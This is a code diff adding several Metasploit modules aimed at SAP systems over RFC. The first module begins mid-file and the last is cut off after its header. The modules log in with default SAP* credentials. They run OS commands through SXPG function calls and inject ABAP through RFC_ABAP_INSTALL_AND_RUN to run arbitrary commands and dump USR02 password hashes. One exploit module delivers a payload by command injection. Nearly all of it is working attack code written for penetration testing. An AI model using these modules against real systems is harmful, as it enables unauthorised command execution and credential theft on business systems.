+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC SXPG_CALL_SYSTEM',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69.
+                              The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+      
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+                       OptString.new('CMD', [true, 'Command Name as in SM69', 'CAT']),
+                       OptString.new('PARAM', [true, 'Command Parameters', '/etc/passwd']),
+                       OptString.new('OS', [true, 'Operating System 1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', '2']),
+                       OptBool.new('VERBOSE', [false, "Be Verbose", false])
+                     ], self.class)
+  end
+
+  def run_host(ip)
+    user = datastore['USER'] if datastore['USER']
+    pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    rport = datastore['RPORT'].to_s.split('')
+    sysnr = rport[2]
+    sysnr << rport[3]
+    exec_CMD(user,client,pass,datastore['rhost'],datastore['rport'],sysnr)
+  end
+
+  def exec_CMD(user, client, pass, rhost, rport, sysnr)
+
+    verbose = datastore['VERBOSE']
+
+    print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+
+    success = false
+    
+    ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    
+    begin
+      auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+     return
+   end
+        
+   begin
+     conn_info = conn.connection_info
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+   end
+
+   function = conn.get_function("SXPG_CALL_SYSTEM")
+   fc = function.get_function_call
+
+   cmd = datastore['CMD'] if datastore['CMD']
+
+   if datastore['OS']
+     case(datastore['OS'])
+       when '1'
+         os = "ANYOS"
+       when '2'
+         os = "UNIX"
+       when '3'
+         os = 'Windows NT'
+       when '4'
+         os = 'AS/400'
+       when '5'
+         os = 'OS/400'
+       else
+         print_error "Invalid OS!"
+     end
+   end
+
+   param = datastore['PARAM'] if datastore['PARAM']
+
+   fc[:COMMANDNAME] = cmd
+   fc[:ADDITIONAL_PARAMETERS] = param
+
+   begin
+     fc.invoke
+     success = true
+   rescue NWError => e
+     print_error("#{rhost}:#{rport} [SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+   end
+
+   saptbl = Msf::Ui::Console::Table.new(
+             Msf::Ui::Console::Table::Style::Default,
+               'Header'  => "[SAP] Command Exec",
+               'Prefix'  => "\n",
+               'Postfix' => "\n",
+               'Indent'  => 1,
+               'Columns' =>
+                        [
+                          "Output"
+                        ])
+
+   data_length = fc[:EXEC_PROTOCOL].size
+
+   for i in 0...data_length
+     data = fc[:EXEC_PROTOCOL][i][:MESSAGE]
+     saptbl << [data]
+   end
+
+   conn.disconnect
+
+   if success
+     print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+     print_good("Command Executed: #{cmd} #{param}")
+     print(saptbl.to_s)
+   end
+  end
+end

--- a/modules/auxiliary/sap/sap_rfc_sxpg_command_exec.rb
+++ b/modules/auxiliary/sap/sap_rfc_sxpg_command_exec.rb
@@ -1,0 +1,165 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC SXPG_COMMAND_EXECUTE',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69.
+                              The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+      
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+                       OptString.new('CMD', [true, 'Command Name as in SM69', 'CAT']),
+                       OptString.new('PARAM', [true, 'Command Parameters', '/etc/passwd']),
+                       OptString.new('OS', [true, 'Operating System 1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', '2']),
+                       OptBool.new('VERBOSE', [false, "Be Verbose", false])
+                     ], self.class)
+  end
+
+  def run_host(ip)
+    user = datastore['USER'] if datastore['USER']
+    pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    rport = datastore['RPORT'].to_s.split('')
+    sysnr = rport[2]
+    sysnr << rport[3]
+    exec_CMD(user,client,pass,datastore['rhost'],datastore['rport'],sysnr)
+  end
+
+  def exec_CMD(user, client, pass, rhost, rport, sysnr)
+    verbose = datastore['VERBOSE']
+
+    print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+
+    success = false
+    
+    ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    
+    begin
+      auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+     return
+   end
+        
+   begin
+     conn_info = conn.connection_info
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+   end
+
+   function = conn.get_function("SXPG_COMMAND_EXECUTE")
+
+   fc = function.get_function_call
+
+   cmd = datastore['CMD'] if datastore['CMD']
+
+   if datastore['OS']
+     case(datastore['OS'])
+       when '1'
+         os = "ANYOS"
+       when '2'
+         os = "UNIX"
+       when '3'
+         os = 'Windows NT'
+       when '4'
+         os = 'AS/400'
+       when '5'
+         os = 'OS/400'
+       else
+         print_error "Invalid OS!"
+     end
+   end
+
+   param = datastore['PARAM'] if datastore['PARAM']
+
+   fc[:COMMANDNAME] = cmd
+   fc[:OPERATINGSYSTEM] = os
+   fc[:ADDITIONAL_PARAMETERS] = param
+
+   begin
+     fc.invoke
+     success = true
+   rescue NWError => e
+     print_error("#{rhost}:#{rport} [SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+   end
+
+   saptbl = Msf::Ui::Console::Table.new(
+              Msf::Ui::Console::Table::Style::Default,
+               'Header'  => "[SAP] Command Exec",
+               'Prefix'  => "\n",
+               'Postfix' => "\n",
+               'Indent'  => 1,
+               'Columns' =>
+                        [
+                          "Output"
+                        ])
+
+   data_length = fc[:EXEC_PROTOCOL].size
+
+   for i in 0...data_length
+     data = fc[:EXEC_PROTOCOL][i][:MESSAGE]
+     saptbl << [data]
+   end
+
+   conn.disconnect
+
+   if success
+     print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+     print(saptbl.to_s)
+   end
+  end
+end

--- a/modules/auxiliary/sap/sap_rfc_system.rb
+++ b/modules/auxiliary/sap/sap_rfc_system.rb
@@ -1,0 +1,153 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC Extract USR02 Hashes',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary SYSTEM commands.
+                              RFC_ABAP_INSTALL_AND_RUN takes ABAP source lines and executes them. It is common for the the function to be disabled or access revoked in a production system. It is also deprecated. 
+                              The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+      
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+                       OptString.new('CMD', [true, 'Command to Execute', 'id']),
+                       OptBool.new('VERBOSE', [false, "Be Verbose", false])
+                     ], self.class)
+  end
+
+  def run_host(ip)
+    user = datastore['USER'] if datastore['USER']
+    pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    rport = datastore['RPORT'].to_s.split('')
+    sysnr = rport[2]
+    sysnr << rport[3]
+    command = datastore['CMD'] if datastore['CMD']
+    exec_SYSTEM(user,client,pass,datastore['rhost'],datastore['rport'], sysnr, command)
+  end
+
+  def exec_SYSTEM(user, client, pass, rhost, rport, sysnr, command)
+    verbose = datastore['VERBOSE']
+
+    print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+
+    success = false
+    
+    ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    
+    begin
+      auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+     return
+   end
+        
+   begin
+     conn_info = conn.connection_info
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+   end
+
+   function = conn.get_function("RFC_ABAP_INSTALL_AND_RUN")
+   fc = function.get_function_call
+
+   code = "REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING." + "\r\n"
+   code << "TYPES lt_line(255) TYPE c." + "\r\n"
+   code << "DATA lv_cmd(42) TYPE c." + "\r\n"
+   code << "DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE." + "\r\n"
+   code << "lv_cmd = '#{command}'." + "\r\n"
+   code << "CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd" + "\r\n"
+   code << "ID 'TAB' FIELD lt_result-*sys*." + "\r\n"
+   code << "LOOP AT lt_result." + "\r\n"
+   code << "WRITE : / lt_result." + "\r\n"
+   code << "ENDLOOP." + "\r\n"
+
+   code.each {|line|
+     fc[:PROGRAM].new_row {|row| row[:LINE] = line.strip}
+   }
+
+   begin
+     fc.invoke
+   rescue NWError => e
+     print_error("#{rhost}:#{rport} [SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+   end
+
+   success = true
+
+   saptbl = Msf::Ui::Console::Table.new(
+             Msf::Ui::Console::Table::Style::Default,
+               'Header'  => "[SAP] Command Exec",
+               'Prefix'  => "\n",
+               'Postfix' => "\n",
+               'Indent'  => 1,
+               'Columns' =>
+                        [
+                          "Output"
+                        ])
+
+   fc[:WRITES].each {|row|
+     saptbl << [ row[:ZEILE]]
+   }
+
+   conn.disconnect
+
+   if success
+     print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+     print_good("#{rhost}:#{rport} [SAP] Executed #{command}")
+     print(saptbl.to_s)
+   end
+ end
+end

--- a/modules/auxiliary/sap/sap_rfc_usr02.rb
+++ b/modules/auxiliary/sap/sap_rfc_usr02.rb
@@ -1,0 +1,165 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC Extract USR02 Hashes',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to extract SAP user hashes from USR02.
+                              RFC_ABAP_INSTALL_AND_RUN takes ABAP source lines and executes them. It is common for the the function to be disabled or access revoked in a production system. It is also deprecated. 
+                              The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+      
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP Router Address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP Router Port Number', nil]),
+                       OptBool.new('VERBOSE', [false, "Be Verbose", false])
+                     ], self.class)
+  end
+
+  def run_host(ip)
+    user = datastore['USER'] if datastore['USER']
+    pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    rport = datastore['RPORT'].to_s.split('')
+    sysnr = rport[2]
+    sysnr << rport[3]
+    exec_USR02(user,client,pass,datastore['rhost'],datastore['rport'], sysnr)
+  end
+
+  def exec_USR02(user, client, pass, rhost, rport, sysnr)
+
+    verbose = datastore['VERBOSE']
+
+    print_status("#{rhost}:#{rport} [SAP] Trying client: '#{client}' username:'#{user}' password:'#{pass}'") if verbose == true
+
+    success = false
+    
+    ashost = rhost
+  
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      ashost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    
+    begin
+      auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => ashost, "sysnr" => sysnr}
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+     return
+   end
+        
+   begin
+     conn_info = conn.connection_info
+   rescue
+     print_error("#{rhost}:#{rport} [SAP] something went wrong :(")
+     return
+   end
+
+   function = conn.get_function("RFC_ABAP_INSTALL_AND_RUN")
+   fc = function.get_function_call
+
+code = <<ABAPCODE
+REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
+DATA: MANDT(3), BNAME(12), BCODE TYPE XUCODE, PASSC TYPE PWD_SHA1.
+EXEC SQL PERFORMING loop_output.
+  SELECT MANDT, BNAME, BCODE, PASSCODE INTO :MANDT, :BNAME, :BCODE, :PASSC
+  FROM USR02
+ENDEXEC.
+FORM loop_output.
+  WRITE: / MANDT, BNAME, BCODE, PASSC.
+ENDFORM.
+ABAPCODE
+
+   code.each {|line|
+     fc[:PROGRAM].new_row {|row| row[:LINE] = line.strip}
+   }
+
+   begin
+     fc.invoke
+   rescue NWError => e
+     print_error("#{rhost}:#{rport} [SAP] FunctionCallException code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+   end
+
+   success = true
+
+   saptbl = Msf::Ui::Console::Table.new(
+             Msf::Ui::Console::Table::Style::Default,
+               'Header'  => "[SAP] Users and hashes",
+               'Prefix'  => "\n",
+               'Postfix' => "\n",
+               'Indent'  => 1,
+               'Columns' =>
+                        [
+                          "MANDT",
+                          "Username",
+                          "BCODE",
+                          "PASSCODE"
+                        ])
+
+   fc[:WRITES].each {|row|
+     string = ""
+     array = row[:ZEILE].split(/ /)
+     array_length = array.size
+       for i in 0...array_length
+         if array[i] == ""
+         else 
+           string << ",#{array[i]}"
+         end
+       end
+      str_array = string.split(/,/)
+      saptbl << [ str_array[1], str_array[2], str_array[3], str_array[4] ]
+   }
+
+   conn.disconnect
+
+   if success
+     print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}")
+     print(saptbl.to_s)
+   end
+  end
+end

--- a/modules/exploits/securestate/sap_rfc_sxpg_call_system.rb
+++ b/modules/exploits/securestate/sap_rfc_sxpg_call_system.rb
@@ -1,0 +1,144 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::EXE
+
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC SXPG_CALL_SYSTEM',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module exploits an arbitrary command execution vulnerability in the SXPG_CALL_SYSTEM Remote Function Call to deliver a custom payload. The exploit requires a valid command as configured in SM69, that accepts additional parameters. We're limited to approx. 256 chars, so don't set a PAYLOAD_SPLIT value higher than 250 to be on the safe side.
+                              The module also requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+                                {
+                                },
+      'Payload'        =>
+                                {
+                                #'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4",
+                                },
+      'Platforms'      => [ 'win' ],
+      'Targets'        =>
+                          [
+                            [
+                              'Windows Universal',
+                               {
+                                 'Arch' => ARCH_X64,
+                                 'Platform' => 'win'
+                               },
+                            ],
+                          ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 01 2012',
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('RHOST', [true, 'SAP Gateway', nil]),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP router address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP router port number', nil]),
+                       OptString.new('CMD', [true, 'Command name as defined in SM49/SM69', 'LIST_DB2DUMP']),
+                       OptBool.new('VERBOSE', [false, "Be verbose", false])
+                     ], self.class)
+    register_advanced_options(
+                              [
+                                OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '250']),
+                              ], self.class)
+  end
+
+  def exploit
+    $first_pass = true
+    $user = datastore['USER'] if datastore['USER']
+    $pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      $client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    $rport = datastore['RPORT'].to_s.split('')
+    $sysnr = $rport[2]
+    $sysnr << $rport[3]
+    $rhost = datastore['RHOST']
+    $verbose = datastore['VERBOSE']
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      $rhost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    $auth_hash = {"user" => $user, "passwd" => $pass, "client" => $client, "ashost" => $rhost, "sysnr" => $sysnr}
+    linemax = datastore['PAYLOAD_SPLIT']
+    print_status("Using custom payload size of #{linemax}") if linemax != 250
+    execute_cmdstager({ :delay => 0.35, :linemax => linemax })
+    handler(nil)
+  end
+
+  def execute_command(cmd, opts)
+    rhost = $rhost
+    rport = $rport
+    client = $client
+    user = $user
+    pass = $pass    
+    cmd.each do |payload|
+      begin
+        conn = Connection.new($auth_hash)
+      rescue NWError => e
+        print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+        print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+        print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+        print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+        abort
+      end
+      print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}") if $first_pass == true
+      print_good("#{rhost}:#{rport} [SAP] Injecting payload into #{datastore['CMD']} via SXPG_CALL_SYSTEM RFC. We're limited to approx. 256 chars, be patient!") if $first_pass == true
+      $first_pass = false
+      begin
+        function = conn.get_function("SXPG_CALL_SYSTEM")
+        fc = function.get_function_call
+      rescue NWError => e
+        print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+        abort
+      end
+      fc[:COMMANDNAME] = datastore['CMD'] if datastore['CMD']
+      fc[:ADDITIONAL_PARAMETERS] = " & #{payload.strip}"
+      begin
+        fc.invoke
+      rescue NWError => e
+        print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+      end
+    conn.disconnect
+    end
+  end
+end

--- a/modules/exploits/securestate/sap_rfc_sxpg_command_exec.rb
+++ b/modules/exploits/securestate/sap_rfc_sxpg_command_exec.rb
@@ -1,0 +1,165 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
